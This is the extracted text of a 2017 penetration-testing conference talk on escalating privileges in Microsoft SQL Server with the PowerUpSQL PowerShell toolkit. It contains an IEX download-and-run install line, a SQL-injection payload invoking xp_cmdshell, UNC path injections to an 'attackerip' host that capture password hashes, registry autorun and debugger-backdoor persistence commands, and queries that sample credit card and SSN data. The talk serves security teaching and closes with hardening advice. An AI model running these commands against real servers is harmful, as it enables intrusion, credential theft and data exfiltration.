Hacking SQL Server

on Scale with PowerShell

____________________________________________________

2017
 Speaker Information
Name: Scott Sutherland

Job: Network & Application Pentester @ NetSPI

Twitter: @_nullbind

Slides: http://slideshare.net/nullbind
http://slideshare.net/netspi

Blogs: https://blog.netspi.com/author/scott-sutherland/

Code: https://github.com/netspi/PowerUpSQL
https://github.com/nullbind
Presentation Overview
● PowerUpSQL Overview

● SQL Server Discovery

● Privilege Escalation Scenarios

o Domain user to SQL Server login
o SQL Server Login to Sysadmin
o Sysadmin to Windows Admin
o Windows Admin to Sysadmin
o Domain Escalation

● Post Exploitation Activities

● General Recommendations
Why SQL Server?
● Used in most enterprise environments

● Used by a lot of development teams

● Used by a lot of vendor solutions

● Supports Windows authentication both

locally and on the domain

● Lots of integration with other Windows

services and tools
Why PowerShell?
● Native to Windows

● Run commands in memory

● Run managed .net code

● Run unmanaged code

● Avoid detection by Anti-virus

● Already flagged as "trusted" by most

application whitelist solutions

● A medium used to write many open source

Pentest toolkits
 PowerUpSQL

https://github.com/netspi/PowerUpSQL
PowerUpSQL Overview: Primary Goals
● Instance Discovery

● Auditing

● Exploitation

● Scalable

● Flexible

● Portable
https://github.com/netspi/PowerUpSQL
PowerUpSQL Overview: Functions
Currently over 70 Functions https://github.com/NetSPI/PowerUpSQL/wiki

Primary Attack Functions

● Invoke-SQLDumpInfo
● Invoke-SQLAudit
● Invoke-SQLEscalatePriv

Popular Auxiliary Functions

● Get-SQLInstanceDomain
● Invoke-SQLOsCmd
● Invoke-SQLOsCLR
● Invoke-SQLImperstonateService
● Invoke-SQLAuditDefaultLoginPw
● Invoke-SQLAuditWeakLoginPw
PowerUpSQL Overview: Where can I get it?
Github
https://github.com/netspi/PowerUpSQL

PowerShell Gallery
https://www.powershellgallery.com/packages/PowerUpSQL/
PowerUpSQL Overview: How do I install it?
Github
Import-Module PowerUpSQL.psd1

IEX(New-Object
System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/P
owerUpSQL.ps1")

Execution policy work arounds

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

PowerShell Gallery
Install-Module -Name PowerUpSQL
PowerUpSQL Overview: Help?
List Functions

Get-Command –Module PowerUpSQL

PowerUpSQL Overview: Help?
Get Command Help

Get-Help Get-SQLServerInfo -Full

SQL Server
Discovery
SQL Server Discovery: Techniques
Attacker Perspective Attack Technique

Unauthenticated ● List from file

● TCP port scan
● UDP port scan
● UDP ping of broadcast addresses
● Azure DNS dictionary attack (x.databases.windows.net)
● Azure DNS lookup via public resources

Local User ● Services

● Registry entries

Domain User ● Service Principal Names

● Azure Portal / PowerShell Modules
SQL Server Discovery: PowerUpSQL
Attacker Perspective PowerUpSQL Function

Unauthenticated Get-SQLInstanceFile

Unauthenticated Get-SQLInstanceUDPScan

Local User Get-SQLInstanceLocal

Domain User Get-SQLInstanceDomain

Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
 Escalating
Privileges
Unauthenticated / Domain User to SQL Login
Testing Login Access: PowerUpSQL
Attacker Perspective Attack PowerUpSQL Function Example

Unauthenticated Dictionary Invoke-SQLAuditWeakLoginPw –Instance “Server1\Instance1”

Attacks -UserFile c:\temp\users.txt –PassFile C:\temp\Passwords.txt

Unauthenticated Default Get-SQLInstanceFile C:\temp\Computers.txt |

Vendor Select Computername |
Passwords Get-SQLInstanceScanUDPThreaded –Verbose |
Get-SQLServerLoginDefaultPw -Verbose

Local User Excessive Get-SQLInstance | Get-SQLConnectionTest -Verbose

Login Priv

Domain Account Excessive Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

Login Priv -Verbose
Testing Login Access: Default App Pw
Testing Login Access: Reusing Results
Do I have to rerun instance discovery every time I want to run a command? No.

Process Command Example

Enumerate $Accessible = Get-SQLInstanceDomain |

Accessible Servers Get-SQLConnectionTestThreaded -Verbose -Threads 15 |
Where-Object {$_.Status –like “Accessible”}

Get server information $Acessible | Get-SQLServerInfo -Verbose

Get database list $Acessible | Get-SQLDatabase -Verbose

Perform audit $Acessible | Invoke-SQLAudit -Verbose

Testing Login Access: DEMO

Identifying Excessive Login Privileges

as a Domain User
Testing Login Access: Demo

DEMO
Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?

● Admins give them access

● Privilege inheritance issue on

domain systems = Public role
access

● SQL Server Express is commonly

vulnerable

● A lot of 3rd party solutions are

affected
Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?

● Admins give them access

● Privilege inheritance issue on

domain systems = Public role
access

● SQL Server Express is commonly

vulnerable

● A lot of 3rd party solutions are

affected
Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?

● Admins give them access

● Privilege inheritance issue on

domain systems = Public role
access

● SQL Server Express is commonly

vulnerable

● A lot of 3rd party solutions are

affected
Escalating
Privileges
SQL Login to SysAdmin
Escalating Privileges: Weak PWs
Didn’t we just cover this? Yes, but there’s more…

Attacker Perspective Attack PowerUpSQL Function Example

Unauthenticated Dictionary Invoke-SQLAuditWeakLoginPw –Instance “Server1\Instance1”

Attacks -UserFile c:\temp\users.txt –PassFile C:\temp\Passwords.txt

Unauthenticated Default Get-SQLInstanceFile C:\temp\Computers.txt |

Vendor Select Computername |
Passwords Get-SQLInstanceScanUDPThreaded –Verbose |
Get-SQLServerLoginDefaultPw -Verbose

Domain Account Excessive Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

Login Priv
Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw –
Verbose
Escalating Privileges: Weak PWs
…we can also enumerate SQL Server logins and Domain Accounts 

Technique PowerUpSQL Function

Blind Login Enumeration Invoke-SQLAuditWeakLoginPw

+
Dictionary Attack • Enumerate all SQL Server logins with the Public role
=
Super Cool! • Enumerate all domain accounts with the Public role
Escalating Privileges: Weak PWs
Enumerating SQL Logins

1. Attempt to list all SQL Server

logins and fail.
Escalating Privileges: Weak PWs
Enumerating SQL Logins

1. Attempt to list all SQL Server

logins and fail.

2. Get principal id for the sa

account with “suser_id”
Escalating Privileges: Weak PWs
Enumerating SQL Logins

1. Attempt to list all SQL Server

logins and fail.

2. Get principal id for the sa account

with “suser_id”

3. Use “suser_name” to get SQL

logins using just principal ID
Escalating Privileges: Weak PWs
Enumerating SQL Logins

1. Attempt to list all SQL Server

logins and fail.

2. Get principal id for the sa account

with “suser_id”

3. Use “suser_name” to get SQL

logins using just principal ID

4. Increment number and repeat

Escalating Privileges: Weak PWs
Enumerating SQL Logins Code gifted from @mobileck
Source:
https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
1. Attempt to list all SQL Server
logins and fail. select n [id], SUSER_NAME(n) [user_name]
from (
select top 10000 row_number() over(order by t1.number) as N
2. Get principal id for the sa account from master..spt_values t1
cross join master..spt_values t2
with “suser_id” )a
where SUSER_NAME(n) is not null

3. Use “suser_name” to get SQL

logins using just principal ID

4. Increment number and repeat

Escalating Privileges: Weak PWs
Enumerating Domain Users

1. Get the domain

Domain of SQL
Server
Escalating Privileges: Weak PWs
Enumerating Domain Users

1. Get the domain

2. GID RID of default group

Full RID of
Domain Admins
group
Escalating Privileges: Weak PWs
Enumerating Domain Users

1. Get the domain

2. GID RID of default group

RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
3. Grab the first 48 Bytes of the full RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Weak PWs
Enumerating Domain Users

1. Get the domain

1. Start with number, 500

2. GID RID of default group 2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
3. Grab the first 48 Bytes of the full RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
4. Create new RID with by appending
a hex number value and the SID
Escalating Privileges: Weak PWs
Enumerating Domain Users

1. Get the domain

1. Start with number, 500

2. GID RID of default group 2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
3. Grab the first 48 Bytes of the full RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
4. Create new RID with by appending a
hex number value and the SID

5. Use “suser_name” function to get

domain object name
Escalating Privileges: Weak PWs
Enumerating Domain Users

1. Get the domain

1. Start with number, 500

2. GID RID of default group 2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
3. Grab the first 48 Bytes of the full RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
4. Create new RID with by appending a
hex number value and the SID

5. Use “suser_name” function to get

domain object name

6. Increment and repeat

Escalating Privileges: DEMO

Get-SQLFuzzServerLogin

Invoke-SQLAuditWeakLoginPw

Get-SQLFuzzDomainAccount
 Escalating Privileges: Impersonation

1. Impersonate Privilege 5. xp_cmdshell proxy acount

• Server: EXECUTE AS LOGIN 6. Create Databse Link to File or Server

• Database: EXECUTE AS USER 7. Import / Install Custom Assemblies

2. Stored Procedure and Trigger Creation / Injection Issues 8. Ad-Hoc Queries

• EXECUTE AS OWNER 9. Shared Service Accounts

• Signed with cert login 10. Database Links

3. Automatic Execution of Stored Procedures 11. UNC Path Injection

4. Agent Jobs 12. Python code execution

• User, Reader, and Operator roles

Escalating Privileges: Impersonation
Impersonate Privilege Pros
• Execute queries/commands in another user context
• Can be used at server layer
Cons
• Commands and queries are not limited in any way
o EXECUTE AS LOGIN
• Requires database to be configured as trustworthy
for OS command execution
• Can be used at database layer

o EXECUTE AS USER
Escalating Privileges: Impersonation
Impersonate Privilege

• Can be used at server layer

o EXECUTE AS LOGIN

• Can be used at database layer

o EXECUTE AS USER
Escalating Privileges: Impersonation
Impersonate Privilege

• Can be used at server layer

o EXECUTE AS LOGIN

• Can be used at database layer

o EXECUTE AS USER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Pros
Issues • Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login Cons
• No granular control over the database owner’s privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB,
which is often a sysadmin
• Requires database to be configured as trustworthy for
OS command execution
• Impersonation can be done via SQL injection under
specific conditions
• Impersonation can be done via command injection under
specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
USE MyAppDb
GO
• EXECUTE AS OWNER can be used to execute a CREATE PROCEDURE sp_escalate_me
stored procedure as another login
WITH EXECUTE AS OWNER
• DB_OWNER role can impersonate the actual AS
database owner EXEC sp_addsrvrolemember
'MyAppUser','sysadmin'
GO
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
USE MyAppDb
GO
• EXECUTE AS OWNER can be used to execute a CREATE PROCEDURE sp_escalate_me
stored procedure as another login
WITH EXECUTE AS OWNER
• DB_OWNER role can impersonate the actual AS
SYSADMIN
database owner EXEC sp_addsrvrolemember is often the
'MyAppUser','sysadmin' OWNER
GO
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Pros
Issues • Can execute queries/commands in another user
context
• Limit commands and queries
• Use signed Procedures
• Don’t have to grant IMPERSONATE
• Granular control over permissions
o Create stored procedure • Database does NOT have to be configured as
trustworthy for OS command execution
o Create a database master key
Cons
o Create a certificate • Impersonation can be done via SQL injection
under specific conditions
o Create a login from the certificate • Impersonation can be done via command
injection under specific conditions
o Configure login privileges

o Sign stored procedure with certifiate

o GRANT EXECUTE to User

Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = ‘
SELECT name FROM master..sysdatabases
WHERE name like ''%'+ @DbName+'%'' OR
name=''tempdb''';
EXECUTE(@query)
END
GO

https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = ‘
SELECT name FROM master..sysdatabases
WHERE name like ''%'+ @DbName+'%'' OR
name=''tempdb''';
EXECUTE(@query)
END
GO
PURE EVIL

https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation
SQL Injection Example

EXEC MASTER.dbo.sp_sqli2
'master'';EXEC master..xp_cmdshell ''whoami''--';

https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
Escalating Privileges: Impersonation
SQL Injection Example
Escalating Privileges: Impersonation
Automatic Execution of Stored Procedure Pros
• Marking a stored procedure to run when the SQL
• Stored procedures ca be configured to execute Server service restarts has many use cases
• Only stored procedures in the master database
when the SQL Server service restarts
can be marked for auto execution

Cons
• No granular control over what context the startup
command is executed in
• All stored procedures marked for auto execution
are executed as ‘sa’, even if ‘sa’ is disabled
• Any non sysadmin access to stored procedures
can lead to execution as ‘sa’
Escalating Privileges: DEMO

Invoke-SQLAudit
Escalating Privileges: Invoke-SQLPrivEsc

Whooray for Automation Demo!

Escalating Privileges: DEMO

Invoke-SQLEscalatePriv
Escalating Privileges: Invoke-SQLPrivEsc

DEMO
 Escalating
Privileges
SysAdmin to Windows Service Account
Escalating Privileges: SysAdmin to Win Account

OS Command Execution Through SQL Server

=
Windows Service Account Impersonation
Escalating Privileges: SysAdmin to Win Account

You don’t need to know the password, crack a hash, or PTH.

Escalating Privileges: SysAdmin to Win Account

There are a lot of options for executing OS commands.

Technique Configuration Requires Requires Notes
Change Sysadmin Disk Read/Write

sp_configure ‘xp_cmdshell', 1;
Add invoke-sqloscmdclr and agents
xp_cmdshell Yes Yes No
RECONFIGURE;

Can be configured with proxy account.

(sp_xp_cmdshell_proxy_account)

Custom Extended Stored No Yes Yes sp_addextendedproc

Procedure

CLR Assembly Yes No No sp_configure ‘clr enabled', 1;

RECONFIGURE;
sp_configure ‘clr strict security', 1;
RECONFIGURE; -- 2017

Requires: Database has ‘Is_Trustworthy’ flag set.

Requires: CREATE ASSEMBLY permission or sysadmin

Agent Job: No No No Can be configured with proxy account.

• CmdExec
• PowerShell Requires one of the roles below:
• SSIS SQLAgentUserRole
• ActiveX: Jscript SQLAgentReaderRole
• ActiveX: VBScript SQLAgentOperatorRole

Python Execution Yes Yes No sp_configure 'external scripts enabled', 1;

RECONFIGURE;

Write to file autorun Yes Yes Yes sp_addlinkedserver

Openrowset
Opendataset

Write to registry autorun Yes Yes Yes xp_regwrite

Escalating Privileges: SysAdmin to Win Account
Escalating Privileges: SysAdmin to Win Account

SQL Server can be configured with different account types.

Escalating Privileges: SysAdmin to Win Account

Service Account Types

● Local User
● Local System
● Network Service
● Local managed service account
● Domain managed service account
● Domain User
● Domain Admin
Escalating Privileges: Invoke-SQLOSCmd
Invoke-SQLOSCMD can be used for basic command execution via xp_cmdshell.

PS C:\>$Accessible | Invoke-SQLOSCmd –Command “whoami”

ComputerName Instance CommandResults

--------------------- ----------- --------------
SQLServer1 SQLServer1\SQLEXPRESS nt service\mssql$sqlexpress
SQLServer1 SQLServer1\STANDARDDEV2014 nt authority\system
SQLServer1 SQLServer1 Domain\SQLSvc
 Escalating
Privileges
Shared Service Accounts
Escalating Privileges: Shared Svc Accounts

Why should I care about shared service accounts?

1. SysAdmins can execute OS commands

2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them!

One account to rule them all!

 Leveraging Shared MS SQL Server Service Accounts

Key
PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

DMZ

LVA HVA

Ports
1433 and 1434

LRA
LVA HVA
Intranet

ADS
 Leveraging Shared MS SQL Server Service Accounts

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection
DMZ

LVA HVA

Ports
1433 and 1434

LRA
LVA HVA
Intranet

ADS
 Leveraging Shared MS SQL Server Service Accounts

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection
DMZ

LVA HVA

2
Execute Local Command Ports
via xp_cmdshell 1433 and 1434

LRA
LVA HVA
Intranet

ADS
 Leveraging Shared MS SQL Server Service Accounts

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection
DMZ

LVA HVA

2
Execute Local Command Ports
via xp_cmdshell 1433 and 1434

3
Execute commands and
gather data from other
database servers via osql
LRA
LVA HVA
Intranet

ADS Access to HVA with shared domain service account

 Escalating
Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling Links
What’s a SQL Server link?

● SQL Server links are basically persistent database connections for SQL Servers.

Why should I care?

● Short answer = privilege escalation

● Public role can use links to execute queries on remote servers (impersonation)

SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’)

● Stored procedures can be executed – like xp_cmdshell ;)

● Links can be crawled

 Leveraging MS SQL Database links

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

DMZ

LVA HVA

Ports
1433 and 1434

LRA
LVA HVA
Intranet

DB1
ADS
 Leveraging MS SQL Database links

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection
DMZ

LVA HVA

Ports
1433 and 1434

LRA
LVA HVA
Intranet

DB1
ADS
 Leveraging MS SQL Database links

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection
DMZ

LVA HVA

Ports
1433 and 1434

LRA
LVA HVA
Intranet

D st
Le
B P
a
L i ri v
nk ile
w ge
ith s

DB1
ADS
 Leveraging MS SQL Database links

Key Captain Evil

PURE
LVA = Low Value Application
EVIL

Internet
HVA = High Value Application
Ports
80 and 443

1
SQL Injection
DMZ

LVA HVA

Ports
1433 and 1434

LRA
LVA HVA
Intranet

D st ith
Le
B P kw t
a
L i ri v Lin oun
nk ile D B a cc
w ge SA
ith s

DB1 Execute SQL queries and

ADS local commands on
database servers via
nested linked services
2
Escalating Privileges: Crawling Links
Penetration Test Stats

● Database links exist (and can be crawled) in about 50% of environments we’ve seen

● The max number of hops we’ve seen is 12

● The max number of servers crawled is 226

 Escalating Privileges: Crawling Links
Old Metasploit Module

● mssql_linkcrawler Module
● Author: Antti Rantasaari and Scott Sutherland - Released 2012
● https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler

New PowerUpSQL Function

● Get-SQLServerLinkCrawl
● Author: Antti Rantasaari
● https://blog.netspi.com/sql-server-link-crawling-powerupsql/
Escalating Privileges: Crawling Links
Function Description

Get-SQLServerLink Get a list of SQL Server Link on the server.

Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command
execution.

Examples

Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1\SQLSERVER2008“

Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1\SQLSERVER2008"

-Query “select * from master..sysdatabases”

Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1\SQLSERVER2008"

-Query “exec master..xp_cmdshell ‘whoami’”
Escalating Privileges: DEMO

Get-SQLServerLinkCrawl
DEMO
Escalating Privileges: Crawling Links
Escalating
Privileges
UNC Path Injection
Escalating Privileges: UNC Injection
UNC Path Injection Summary

● UNC paths are used for accessing remote file servers like so \\192.168.1.4\file

● Almost all procedures that accept a file path in SQL Server, support UNC paths

● UNC paths can be used to force the SQL Server service account to authenticate to an attacker

● An attacker can then capture the NetNTLM password hash and crack or relay it

● Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Injection
Escalating Privileges: UNC Injection
The Issue

• By DEFAULT, the PUBLIC role can execute at least two procedures that accept a file path

xp_dirtree '\\attackerip\file‘
xp_fileexists '\\attackerip\file‘

The Solution

• EXECUTE rights on xp_dirtree and fileexists can be REVOKED for the Public role
(but no one does that)

UNC Path Injection Cheat Sheet (More options)

• https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
Escalating Privileges: UNC Injection
Another Issue

• The Public role can perform UNC path injection into the BACKUP and RESTORE
commands even though it can’t perform the actual backup/restore:

BACKUP LOG [TESTING] TO DISK = '\\attackerip\file‘

RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'

Partial Solution

• A patch was released for SQL Server versions 2012 through 2016

https://technet.microsoft.com/library/security/MS16-131

• There is no patch for SQL Server 2000 to 2008

Escalating Privileges: UNC Injection
So, in summary…

1. The PUBLIC role can access the

SQL Server service account
NetNTLM password hash by default
2. A ton of domain users have PUBLIC
role access
3. Whooray for domain privilege
escalation!
Escalating Privileges: DEMO

Get-SQLServiceAccountPwHashes
…what? It’s self descriptive 
Escalating Privileges: UNC Path Injection

DEMO
Escalating
Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin

Two things to remember…

1. Different SQL Server versions can be abused in different ways

2. All SQL Server versions provide the service account with sysadmin privileges.
Escalating Privileges: OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016

Read LSA Secrets x x x x x x

Dump Wdigest or NTLM

x x x x x x
password hash from Memory

Process Migration
(Remote DLL or Shellcode x x x x x x
Injection)

Steal Authentication Token

from SQL Server service x x x x x x
process

Log into SQL Server as a local

x x
administrator
Log into SQL Server as a
x x x
LocalSystem
Log into SQL Server in Single
User Mode as a local ? x x x x x
administrator
Escalating Privileges: OS Admin to SysAdmin
Account Default
Account
Approach Password Sysadmin Common Tools
Here are some tool options... Recovery
Impersonation
Privileges

Read LSA Secrets

(Because service accounts)
X Mimikatz, Metasploit, PowerSploit, Empire, LSADump

Mimikatz, Metasploit, PowerSploit, Empire

Dump Wdigest or NTLM
password hash from Memory
X
Note: This tends to fail on protected processes.

Process Migration Metasploit, PowerSploit, Empire

(Remote DLL or Shellcode X Python, Powershell, C, C++
Injection)

Metasploit, Incognito, Invoke-TokenManipulation

Steal Authentication Token from
SQL Server service process
X

Any SQL Server client.

Log into SQL Server as a local
administrator
X
Note: Only affects older versions.
Ay SQL Server client and PSExec.
Log into SQL Server as a
LocalSystem
X
Note: Only affects older versions.

Log into SQL Server in Single

User Mode as a local X DBATools
administrator
Escalating Privileges: DEMO

Invoke-SQLImpersonateService

(Wraps Invoke-TokenManipulation)
Common
Post
Exploitation
Activities
Post Exploitation: Overview
Common Post Exploitation Activities

1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.

2. Identify Sensitive Data

• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples

3. Exfiltrate Sensitive Data

• All standard methods: Copy database, TCP ports, UDP ports, DNS tunneling,
ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL
yet)
Post Exploitation: Persistence
Task Command Example

Registry Autorun Get-SQLPersistRegRun -Verbose -Name EvilSauce

Persistence -Command "\\EvilBox\EvilSandwich.exe" -Instance
"SQLServer1\STANDARDDEV2014"
Debugger Backdoor Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe
Persistence -Command 'c:\windows\system32\cmd.exe' -Instance
"SQLServer1\STANDARDDEV2014"
Post Exploitation: Persistence
Post Exploitation: Finding Data
Task Command Example

Locate Encrypted Get-SQLInstanceDomain -Verbose |

Databases Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults |
Where-Object {$_.is_encrypted –eq “TRUE”}
Locate and Sample Get-SQLInstanceDomain -Verbose |
Sensitive Columns Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword
and Export to CSV “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults |
Export-CSV –NoTypeInformation c:\temp\datasample.csv
Post Exploitation: DEMO

Hunting for Sensitive Data

Post Exploitation: Finding Sensitive Data

DEMO
 General
Recommendations
General Recommendations
1. Enforce least privilege everywhere!

2. Disable dangerous default stored procedures.

3. Install security patches or upgrade to latest version.

4. Audit and fix insecure configurations.

5. Use policy based management for standardizing configurations.

6. Enable auditing at the server and database levels, and monitor for potentially malicious activity.
Take Aways
1. SQL Server is everywhere
2. SQL Server has many trust relationships with Windows and Active Directory
3. SQL Server has many default and common configurations that can be exploited to gain access
4. Tons of domain users have the ability to login into SQL Server
5. Service accounts have sysadmin privileges
6. Shared service accounts can be dangerous
7. PowerUpSQL can be used for basic auditing and exploiting of common SQL Server issues

@_nullbind https://github.com/netspi/PowerUpSQL
PowerUpSQL Overview: Thanks!

Individual Third Party Code / Direct Contributors

Boe Prox Runspace blogs

Warren F. ( RamblingCookieMonster) Invoke-Parallel function

Oyvind Kallstad Test-IsLuhnValid function

Kevin Robertson Invoke-Inveigh

Joe Bialek Invoke-TokenManipulation

Antti Rantasaari, Eric Gruber, and Alexander Contributions and QA

Leary, @leoloobeek, and @ktaranov
Khai Tran Design advice

NetSPI assessment team and dev team Design advice

 Questions?
Name: Scott Sutherland

Job: Network & Application Pentester @ NetSPI

Twitter: @_nullbind

Slides: http://slideshare.net/nullbind
http://slideshare.net/netspi

Blogs: https://blog.netspi.com/author/scott-sutherland/

Code: https://github.com/netspi/PowerUpSQL
https://github.com/nullbind